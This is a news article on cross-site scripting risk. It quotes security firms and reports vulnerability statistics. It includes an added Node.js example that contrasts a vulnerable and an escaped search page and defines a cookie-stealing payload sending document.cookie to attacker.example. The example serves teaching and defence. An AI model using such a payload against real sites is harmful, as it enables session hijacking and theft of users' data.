XSS risk explained: How ‘cross-site scripting’ continues to translate into an attack vector coveted by identity thieves

By Rodika Tollefson

While many companies focus their efforts on preventing major breaches, cyber criminals are taking advantage of the lower-hanging fruit, like cross-site scripting (XSS).


Despite a decline in XSS activity in the past couple of years, a large number of sites — even major ones like Amazon, Google and Facebook — have been found vulnerable.

Amazon.com’s most recent vulnerability was reported on March 21 to the public archive XSSposed and was not patched for two days, putting both website users and administrators at risk of being compromised.

Cross-site scripting is a web application vulnerability that lets an attacker inject script into a page the site serves, so that the script runs in the user’s browser as if it were the site’s own code, with access to that site’s cookies, session and page content.

This could allow bad actors to do anything from stealing personal information and accessing sensitive data to taking complete control over a machine through a drive-by download attack.

“Almost every large website is vulnerable to XSS,” says Ilia Kolochenko, CEO of High-Tech Bridge, a cybersecurity company focused on breach prevention through automated and manual penetration testing.

“In 2004, when XSS first started to appear, the main and basically sole vector was stealing cookies, while now it’s more about sophisticated phishing and drive-by download,” Kolochenko says.
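The injection mechanism described above, and the cookie-theft vector Kolochenko refers to, as an added example that is not from the article or from any company it cites: a Node.js fragment that renders a search page two ways, one splicing the raw query into the markup (the XSS bug) and one HTML-escaping it first, then checks whether a constructed cookie-stealing payload survives as live script. The function names, the attacker.example host and the sample payload are placeholders chosen for this example.

```javascript
// Added example (not from the article): reflected XSS in a search page
// that echoes the user's query, shown vulnerable and hardened.
//
// Names (renderSearchPage, renderSearchPageSafe, escapeHtml,
// reflectsScript, sessionCookieHeader) and the attacker.example host are
// placeholders chosen for this example.

// Constructed attacker input: the classic cookie-stealing payload of the
// kind that dominated early XSS. It creates an image whose URL carries
// document.cookie to a host the attacker controls.
const PAYLOAD =
  "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>";

// VULNERABLE: user input is concatenated straight into the page markup,
// so a query containing <script> becomes script the browser executes.
function renderSearchPage(query) {
  return "<html><body><h1>Results for: " + query + "</h1></body></html>";
}

// Escape the five characters that let text break out of an HTML text
// node or a quoted attribute value. '&' is escaped first so the
// entities produced by the later steps are not double-encoded.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// HARDENED: the same page, with the query escaped before insertion.
// The payload still appears on the page, but as inert text.
function renderSearchPageSafe(query) {
  return "<html><body><h1>Results for: " + escapeHtml(query) + "</h1></body></html>";
}

// Crude check a unit test can apply to rendered output: does a raw
// <script tag survive, unescaped, in the HTML?
function reflectsScript(html) {
  return /<script\b/i.test(html);
}

// Defence in depth for the cookie-theft case specifically: a session
// cookie set with HttpOnly is not exposed through document.cookie, so
// even a successful injection cannot read it for exfiltration.
function sessionCookieHeader(sessionId) {
  return "sid=" + encodeURIComponent(sessionId) +
    "; HttpOnly; Secure; SameSite=Lax; Path=/";
}

// Stand-alone demo: run with `node xss-demo.js`.
function demo() {
  const vulnerable = renderSearchPage(PAYLOAD);
  const hardened = renderSearchPageSafe(PAYLOAD);
  console.log("vulnerable:", vulnerable);
  console.log("hardened  :", hardened);
  console.log("script reflected? vulnerable=" + reflectsScript(vulnerable) +
    " hardened=" + reflectsScript(hardened));
  console.log("Set-Cookie:", sessionCookieHeader("abc123"));
}
demo();
```

Output encoding is the primary fix: the safe renderer changes nothing about what the user typed, only how it is written into the HTML context. The HttpOnly flag is a second, independent layer that limits what a successful injection can steal; it does not prevent the injection itself.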

Since its inception in June 2014, XSSposed has logged more than 8,900 reported vulnerabilities, fewer than 1,300 of which have been fixed. Its list includes more than 1,500 VIP websites, among them noaa.gov, weather.com and espn.go.com, that still have unpatched vulnerabilities.

In a research and intelligence report on XSS published last December, IBM said that of the more than 900 dynamic Web application scans its team reviewed, 17 percent turned up an XSS vulnerability.

“While this may not sound like a very high percentage, take into account that this data sample comes from organizations that have extremely mature and established security practices,” analyst Nikita Gupta wrote in the report.

For cybercriminals, vulnerable websites are attractive regardless of size, location or type of business, according to High-Tech Bridge.

High-profile ones could fetch as much as $1,000 on the black market, the company said. And while smaller ones may only cost $1, they’re much easier to compromise — making them just as attractive.

A WhiteHat Security 2014 Website Security Statistics Report showed that cross-site scripting was the most common vulnerability class across most of the programming languages it analyzed.

Kolochenko said he expects the trend to continue because detecting some subtypes of XSS is complicated, and automated scanners cannot find every XSS flaw.

He notes that a recent report by market research and consulting company Frost & Sullivan shows an increase in hybrid (automated and manual) testing of Web applications.

The report says that while businesses “continue to underestimate the risk associated with unprotected Web applications,” hackers are increasingly relying on automated methods “to target a broad set of victims.”

Kolochenko notes, “The XSS vulnerability discovered on Amazon.com is just another confirmation that automated scanning tools and solutions are not enough to assume continuous website security.”
